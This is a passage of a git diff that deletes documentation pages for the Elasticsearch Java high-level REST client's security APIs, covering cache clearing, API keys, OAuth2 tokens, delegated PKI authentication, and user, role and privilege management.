-<1> the name of the application(s) for which the cache should be cleared - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Privileges Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/clear-realm-cache.asciidoc b/docs/java-rest/high-level/security/clear-realm-cache.asciidoc deleted file mode 100644 index 41c100e1ec8..00000000000 --- a/docs/java-rest/high-level/security/clear-realm-cache.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ - --- -:api: clear-realm-cache -:request: ClearRealmCacheRequest -:response: ClearRealmCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear Realm Cache API - -[id="{upid}-{api}-request"] -==== Clear Realm Cache Request - -A +{request}+ supports defining the name of realms and usernames that the cache should be cleared -for. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Roles Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/clear-roles-cache.asciidoc b/docs/java-rest/high-level/security/clear-roles-cache.asciidoc deleted file mode 100644 index 39e344f6ce9..00000000000 --- a/docs/java-rest/high-level/security/clear-roles-cache.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ - --- -:api: clear-roles-cache -:request: ClearRolesCacheRequest -:response: ClearRolesCacheResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Clear Roles Cache API - -[id="{upid}-{api}-request"] -==== Clear Roles Cache Request - -A +{request}+ supports defining the name of roles that the cache should be cleared for. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Clear Roles Cache Response - -The returned +{response}+ allows to retrieve information about where the cache was cleared. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the list of nodes that the cache was cleared on diff --git a/docs/java-rest/high-level/security/create-api-key.asciidoc b/docs/java-rest/high-level/security/create-api-key.asciidoc deleted file mode 100644 index 497c0fb35e4..00000000000 --- a/docs/java-rest/high-level/security/create-api-key.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: create-api-key -:request: CreateApiKeyRequest -:response: CreateApiKeyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Create API Key API - -API Key can be created using this API. 
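Before the request and response details below, a rough end-to-end sketch may help. It is purely hypothetical: the role definition, key name and expiration are made up, and the exact constructor and getter shapes (`CreateApiKeyRequest`, `Role.builder()`, `getKey()`) are assumptions rather than guaranteed API; the documented snippets follow in the next sections.

["source","java"]
--------------------------------------------------
// Hypothetical: a key restricted to reading the "posts" index, expiring after seven days.
List<Role> roles = Collections.singletonList(Role.builder()
    .name("posts_read_role")
    .clusterPrivileges("monitor")
    .indicesPrivileges(IndicesPrivileges.builder().indices("posts").privileges("read").build())
    .build());

CreateApiKeyRequest request = new CreateApiKeyRequest(
    "my-api-key", roles, TimeValue.timeValueDays(7), RefreshPolicy.WAIT_UNTIL);
CreateApiKeyResponse response = client.security().createApiKey(request, RequestOptions.DEFAULT);

String id = response.getId();                    // id of the newly created key
SecureString apiKey = response.getKey();         // the key itself, used to authenticate to Elasticsearch (assumed getter)
Instant expiration = response.getExpiration();   // null if the key does not expire (assumed getter)
--------------------------------------------------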
- -[id="{upid}-{api}-request"] -==== Create API Key Request - -A +{request}+ contains an optional name for the API key, -an optional list of role descriptors to define permissions and -optional expiration for the generated API key. -If expiration is not provided then by default the API -keys do not expire. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Create API Key Response - -The returned +{response}+ contains an id, -API key, name for the API key and optional -expiration. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the API key that can be used to authenticate to Elasticsearch. -<2> expiration if the API keys expire diff --git a/docs/java-rest/high-level/security/create-token.asciidoc b/docs/java-rest/high-level/security/create-token.asciidoc deleted file mode 100644 index d911c747a13..00000000000 --- a/docs/java-rest/high-level/security/create-token.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-create-token]] -=== Create Token API - -[[java-rest-high-security-create-token-request]] -==== Request -The `CreateTokenRequest` supports three different OAuth2 _grant types_: - -===== Password Grants - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-password-request] --------------------------------------------------- - -===== Refresh Token Grants -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-refresh-request] --------------------------------------------------- - -===== Client Credential Grants -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-client-credentials-request] --------------------------------------------------- - -[[java-rest-high-security-create-token-execution]] -==== Execution - -Creating a OAuth2 security token can be performed by passing the appropriate request to the - `security().createToken()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-execute] --------------------------------------------------- - -[[java-rest-high-security-create-token-response]] -==== Response - -The returned `CreateTokenResponse` contains the following properties: - -`accessToken`:: This is the newly created access token. - It can be used to authenticate to the Elasticsearch cluster. -`type`:: The type of the token, this is always `"Bearer"`. -`expiresIn`:: The length of time until the token will expire. - The token will be considered invalid after that time. -`scope`:: The scope of the token. May be `null`. -`refreshToken`:: A secondary "refresh" token that may be used to extend - the life of an access token. May be `null`. 
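A hedged sketch of the password and refresh token grants described above; the static factory names (`passwordGrant`, `refreshTokenGrant`) and the getters are assumptions based on the property names listed, and the user name and password are made up:

["source","java"]
--------------------------------------------------
// Obtain a token with a password grant (user name and password are made up):
CreateTokenRequest passwordGrant =
    CreateTokenRequest.passwordGrant("test_user", "password-of-test-user".toCharArray());
CreateTokenResponse token = client.security().createToken(passwordGrant, RequestOptions.DEFAULT);

String accessToken = token.getAccessToken();     // sent as "Authorization: Bearer <accessToken>"
String refreshToken = token.getRefreshToken();   // may be null, depending on the grant type

// Later, exchange the refresh token for a fresh access token:
CreateTokenResponse refreshed = client.security()
    .createToken(CreateTokenRequest.refreshTokenGrant(refreshToken), RequestOptions.DEFAULT);
--------------------------------------------------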
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-response] --------------------------------------------------- -<1> The `accessToken` can be used to authenticate to Elasticsearch. -<2> The `refreshToken` can be used to create a new `CreateTokenRequest` with a `refresh_token` grant. - -[[java-rest-high-security-create-token-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().createTokenAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-execute-async] --------------------------------------------------- -<1> The `CreateTokenRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `CreateTokenResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[create-token-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/security/delegate-pki-authentication.asciidoc b/docs/java-rest/high-level/security/delegate-pki-authentication.asciidoc deleted file mode 100644 index ca3f832f405..00000000000 --- a/docs/java-rest/high-level/security/delegate-pki-authentication.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ --- -:api: delegate-pki -:request: DelegatePkiAuthenticationRequest -:response: DelegatePkiAuthenticationResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delegate PKI Authentication API - -This API is called by *smart* proxies to Elasticsearch, such as Kibana, that -terminate the user's TLS session but that still wish to authenticate the user -on the Elasticsearch side using a PKI realm, which normally requires users to -authenticate over TLS directly to Elasticsearch. It implements the exchange of -the client's `X509Certificate` chain from the TLS authentication into an -Elasticsearch access token. - -IMPORTANT: The association between the subject public key in the target -certificate and the corresponding private key is *not* validated. This is part -of the TLS authentication process and it is delegated to the proxy calling this -API. The proxy is *trusted* to have performed the TLS authentication, and this -API translates that authentication into an Elasticsearch access token. - -[id="{upid}-{api}-request"] -==== Delegate PKI Authentication Request - -The request contains the client's `X509Certificate` chain. The -certificate chain is represented as a list where the first element is the -target certificate containing the subject distinguished name that is requesting -access. This may be followed by additional certificates, with each subsequent -certificate being the one used to certify the previous one.
The certificate -chain is validated according to RFC 5280, by sequentially considering the trust -configuration of every installed `PkiRealm` that has -`PkiRealmSettings#DELEGATION_ENABLED_SETTING` set to `true` (default is -`false`). A successfully trusted target certificate is also subject to -the validation of the subject distinguished name according to that respective -realm's `PkiRealmSettings#USERNAME_PATTERN_SETTING`. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delegate-pki-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delegate PKI Authentication Response - -The returned +{response}+ contains the following properties: - -`accessToken`:: This is the newly created access token. - It can be used to authenticate to the Elasticsearch cluster. -`type`:: The type of the token, this is always `"Bearer"`. -`expiresIn`:: The length of time (in seconds) until the token will expire. - The token will be considered invalid after that time. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delegate-pki-response] --------------------------------------------------- -<1> The `accessToken` can be used to authenticate to Elasticsearch. - - diff --git a/docs/java-rest/high-level/security/delete-privileges.asciidoc b/docs/java-rest/high-level/security/delete-privileges.asciidoc deleted file mode 100644 index 827ccf5b1e5..00000000000 --- a/docs/java-rest/high-level/security/delete-privileges.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ --- -:api: delete-privileges -:request: DeletePrivilegesRequest -:response: DeletePrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Privileges API - -This API can be used to delete application privileges.
- -[id="{upid}-{api}-request"] -==== Delete Application Privileges Request - -A +{request}+ has two arguments - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> the name of application -<2> the name(s) of the privileges to delete that belong to the given application - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Application Privileges Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> the name of the application -<2> whether the given privilege was found and deleted diff --git a/docs/java-rest/high-level/security/delete-role-mapping.asciidoc b/docs/java-rest/high-level/security/delete-role-mapping.asciidoc deleted file mode 100644 index 5279d953688..00000000000 --- a/docs/java-rest/high-level/security/delete-role-mapping.asciidoc +++ /dev/null @@ -1,52 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-delete-role-mapping]] -=== Delete Role Mapping API - -[[java-rest-high-security-delete-role-mapping-execution]] -==== Execution -Deletion of a role mapping can be performed using the `security().deleteRoleMapping()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-execute] --------------------------------------------------- - -[[java-rest-high-security-delete-role-mapping-response]] -==== Response -The returned `DeleteRoleMappingResponse` contains a single field, `found`. If the mapping -is successfully found and deleted, found is set to true. Otherwise, found is set to false. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-response] --------------------------------------------------- -<1> `found` is a boolean indicating whether the role mapping was found and deleted - -[[java-rest-high-security-delete-role-mapping-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().deleteRoleMappingAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-execute-async] --------------------------------------------------- -<1> The `DeleteRoleMappingRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `DeleteRoleMappingResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[delete-role-mapping-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. 
The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument diff --git a/docs/java-rest/high-level/security/delete-role.asciidoc b/docs/java-rest/high-level/security/delete-role.asciidoc deleted file mode 100644 index d2f4ef6f88a..00000000000 --- a/docs/java-rest/high-level/security/delete-role.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ --- -:api: delete-role -:request: DeleteRoleRequest -:response: DeleteRoleResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Role API - -[id="{upid}-{api}-request"] -==== Delete Role Request - -A +{request}+ has a single argument - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> role to delete - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Delete Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> whether the given role was found diff --git a/docs/java-rest/high-level/security/delete-user.asciidoc b/docs/java-rest/high-level/security/delete-user.asciidoc deleted file mode 100644 index 43d65fc4e97..00000000000 --- a/docs/java-rest/high-level/security/delete-user.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: delete-user -:request: DeleteUserRequest -:response: DeleteUserResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete User API - -[id="{upid}-{api}-request"] -==== Delete User Request - -A user can be deleted as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Delete Response - -The returned +{response}+ allows to retrieve information about the executed - operation as follows: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> whether the given user was found - -include::../execution.asciidoc[] \ No newline at end of file diff --git a/docs/java-rest/high-level/security/disable-user.asciidoc b/docs/java-rest/high-level/security/disable-user.asciidoc deleted file mode 100644 index 90b89c2779f..00000000000 --- a/docs/java-rest/high-level/security/disable-user.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-disable-user]] -=== Disable User API - -[[java-rest-high-security-disable-user-execution]] -==== Execution - -Disabling a user can be performed using the `security().disableUser()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[disable-user-execute] --------------------------------------------------- - -[[java-rest-high-security-disable-user-response]] -==== Response - -The returned `Boolean` indicates the request status. 
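As an illustrative, hypothetical sketch only (the constructor shape of `DisableUserRequest` is an assumption, and the user name is made up), disabling a user synchronously might look like:

["source","java"]
--------------------------------------------------
// Hypothetical: disable the user "jacknich" and wait for the change to be visible.
DisableUserRequest disableRequest = new DisableUserRequest("jacknich", RefreshPolicy.IMMEDIATE);
boolean acknowledged = client.security().disableUser(disableRequest, RequestOptions.DEFAULT);
if (acknowledged) {
    // the user can no longer authenticate until enabled again via the Enable User API
}
--------------------------------------------------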
- -[[java-rest-high-security-disable-user-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[disable-user-execute-async] --------------------------------------------------- -<1> The `DisableUser` request to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `Boolean` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[disable-user-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of failure. The raised exception is provided as an argument. diff --git a/docs/java-rest/high-level/security/enable-user.asciidoc b/docs/java-rest/high-level/security/enable-user.asciidoc deleted file mode 100644 index 7e8bac12e27..00000000000 --- a/docs/java-rest/high-level/security/enable-user.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-enable-user]] -=== Enable User API - -[[java-rest-high-security-enable-user-execution]] -==== Execution - -Enabling a disabled user can be performed using the `security().enableUser()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[enable-user-execute] --------------------------------------------------- - -[[java-rest-high-security-enable-user-response]] -==== Response - -The returned `Boolean` indicates the request status. - -[[java-rest-high-security-enable-user-async]] -==== Asynchronous Execution - -This request can be executed asynchronously: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[enable-user-execute-async] --------------------------------------------------- -<1> The `EnableUser` request to execute and the `ActionListener` to use when -the execution completes. - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `Boolean` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[enable-user-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument. -<2> Called in case of failure. The raised exception is provided as an argument. 
diff --git a/docs/java-rest/high-level/security/get-api-key.asciidoc b/docs/java-rest/high-level/security/get-api-key.asciidoc deleted file mode 100644 index e8dad80b59b..00000000000 --- a/docs/java-rest/high-level/security/get-api-key.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ --- -:api: get-api-key -:request: GetApiKeyRequest -:response: GetApiKeyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get API Key information API - -API Key(s) information can be retrieved using this API. - -[id="{upid}-{api}-request"] -==== Get API Key Request -The +{request}+ supports retrieving API key information for - -. A specific API key - -. All API keys for a specific realm - -. All API keys for a specific user - -. All API keys for a specific user in a specific realm - -. A specific key or all API keys owned by the current authenticated user - -. All API keys if the user is authorized to do so - -===== Retrieve a specific API key by its id -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-api-key-id-request] --------------------------------------------------- - -===== Retrieve a specific API key by its name -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-api-key-name-request] --------------------------------------------------- - -===== Retrieve all API keys for given realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-realm-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for a given user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-user-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for given user in a realm -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-user-realm-api-keys-request] --------------------------------------------------- - -===== Retrieve all API keys for the current authenticated user -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-api-keys-owned-by-authenticated-user-request] --------------------------------------------------- - -===== Retrieve all API keys if the user is authorized to do so -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-all-api-keys-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get API Key information API Response - -The returned +{response}+ contains the information regarding the API keys that were -requested. - -`api_keys`:: Available using `getApiKeyInfos`, contains list of API keys that were retrieved for this request. 
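For orientation, a hedged sketch of retrieving and iterating the key metadata; `getApiKeyInfos` is taken from the description above, while the request factory, the realm name and the `ApiKey` getters are assumptions:

["source","java"]
--------------------------------------------------
// Hypothetical: list every key of the "native1" realm.
GetApiKeyRequest request = GetApiKeyRequest.usingRealmName("native1");
GetApiKeyResponse response = client.security().getApiKey(request, RequestOptions.DEFAULT);
for (ApiKey apiKey : response.getApiKeyInfos()) {
    String id = apiKey.getId();       // assumed getter
    String name = apiKey.getName();   // assumed getter
    // further metadata such as owner, realm, creation and expiration time is expected here as well
}
--------------------------------------------------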
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/security/get-builtin-privileges.asciidoc b/docs/java-rest/high-level/security/get-builtin-privileges.asciidoc deleted file mode 100644 index 8a79d20f39b..00000000000 --- a/docs/java-rest/high-level/security/get-builtin-privileges.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ --- -:api: get-builtin-privileges -:request: GetBuiltinPrivilegesRequest -:response: GetBuiltinPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Builtin Privileges API - -include::../execution-no-req.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Builtin Privileges Response - -The returned +{response}+ contains the following properties - -`clusterPrivileges`:: -A `Set` of all _cluster_ privileges that are understood by this node. - -`indexPrivileges`:: -A `Set` of all _index_ privileges that are understood by this node. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - diff --git a/docs/java-rest/high-level/security/get-certificates.asciidoc b/docs/java-rest/high-level/security/get-certificates.asciidoc deleted file mode 100644 index 5ada3c8a712..00000000000 --- a/docs/java-rest/high-level/security/get-certificates.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ - --- -:api: get-certificates -:response: GetSslCertificatesResponse --- - -[role="xpack"] -[id="{upid}-{api}"] -=== SSL Certificate API - -[id="{upid}-{api}-request"] -==== Get Certificates Request - -The X.509 Certificates that are used to encrypt communications in an -Elasticsearch cluster using the `security().getSslCertificates()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[{api}-execute] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Get Certificates Response - -The returned +{response}+ contains a single field, `certificates`. -This field, accessed with `getCertificates` returns a List of `CertificateInfo` -objects containing the information for all the certificates used. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[{api}-response] --------------------------------------------------- -<1> `certificates` is a List of `CertificateInfo` - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/security/get-privileges.asciidoc b/docs/java-rest/high-level/security/get-privileges.asciidoc deleted file mode 100644 index d63f4774d07..00000000000 --- a/docs/java-rest/high-level/security/get-privileges.asciidoc +++ /dev/null @@ -1,47 +0,0 @@ - --- -:api: get-privileges -:request: GetPrivilegesRequest -:response: GetPrivilegesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Privileges API - -[id="{upid}-{api}-request"] -==== Get Privileges Request - -The +{request}+ supports getting privilege(s) for all or for specific applications. 
- -===== Specific privilege of a specific application - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -===== All privileges of a specific application - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-all-application-privileges-request] --------------------------------------------------- - -===== All privileges of all applications - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[get-all-privileges-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Privileges Response - -The returned +{response}+ allows to get information about the retrieved privileges as follows. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- \ No newline at end of file diff --git a/docs/java-rest/high-level/security/get-role-mappings.asciidoc b/docs/java-rest/high-level/security/get-role-mappings.asciidoc deleted file mode 100644 index b279702a4e1..00000000000 --- a/docs/java-rest/high-level/security/get-role-mappings.asciidoc +++ /dev/null @@ -1,68 +0,0 @@ -[role="xpack"] -[[java-rest-high-security-get-role-mappings]] -=== Get Role Mappings API - -[[java-rest-high-security-get-role-mappings-execution]] -==== Execution - -Retrieving a role mapping can be performed using the `security().getRoleMappings()` -method and by setting role mapping name on `GetRoleMappingsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-execute] --------------------------------------------------- - -Retrieving multiple role mappings can be performed using the `security.getRoleMappings()` -method and by setting role mapping names on `GetRoleMappingsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-list-execute] --------------------------------------------------- - -Retrieving all role mappings can be performed using the `security.getRoleMappings()` -method and with no role mapping name on `GetRoleMappingsRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-all-execute] --------------------------------------------------- - -[[java-rest-high-security-get-role-mappings-response]] -==== Response - -The returned `GetRoleMappingsResponse` contains the list of role mapping(s). 
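As a rough, illustrative sketch (assuming an already initialized `RestHighLevelClient` named `client`; the `ExpressionRoleMapping` accessor names are assumptions), the response might be consumed like this:

["source","java"]
--------------------------------------------------
// Illustrative sketch: fetch one role mapping by name and print its roles.
// Assumes an initialized RestHighLevelClient `client`; accessor names are assumptions.
GetRoleMappingsRequest request = new GetRoleMappingsRequest("mapping-example");
GetRoleMappingsResponse response = client.security().getRoleMappings(request, RequestOptions.DEFAULT);
for (ExpressionRoleMapping mapping : response.getMappings()) {
    System.out.println(mapping.getName() + " -> " + mapping.getRoles());
}
--------------------------------------------------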
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-response] --------------------------------------------------- - -[[java-rest-high-security-get-role-mappings-async]] -==== Asynchronous Execution - -This request can be executed asynchronously using the `security().getRoleMappingsAsync()` -method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-execute-async] --------------------------------------------------- -<1> The `GetRoleMappingsRequest` to execute and the `ActionListener` to use when -the execution completes - -The asynchronous method does not block and returns immediately. Once the request -has completed the `ActionListener` is called back using the `onResponse` method -if the execution successfully completed or using the `onFailure` method if -it failed. - -A typical listener for a `GetRoleMappingsResponse` looks like: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/SecurityDocumentationIT.java[get-role-mappings-execute-listener] --------------------------------------------------- -<1> Called when the execution is successfully completed. The response is -provided as an argument -<2> Called in case of failure. The raised exception is provided as an argument \ No newline at end of file diff --git a/docs/java-rest/high-level/security/get-roles.asciidoc b/docs/java-rest/high-level/security/get-roles.asciidoc deleted file mode 100644 index 2c698222c7a..00000000000 --- a/docs/java-rest/high-level/security/get-roles.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ - --- -:api: get-roles -:request: GetRolesRequest -:response: GetRolesResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Roles API - -[id="{upid}-{api}-request"] -==== Get Roles Request - -Retrieving a role can be performed using the `security().getRoles()` -method and by setting the role name on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -Retrieving multiple roles can be performed using the `security().getRoles()` -method and by setting multiple role names on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-list-request] --------------------------------------------------- - -Retrieving all roles can be performed using the `security().getRoles()` -method without specifying any role names on +{request}+: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-all-request] --------------------------------------------------- - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Get Roles Response - -The returned +{response}+ allows getting information about the retrieved roles as follows. 
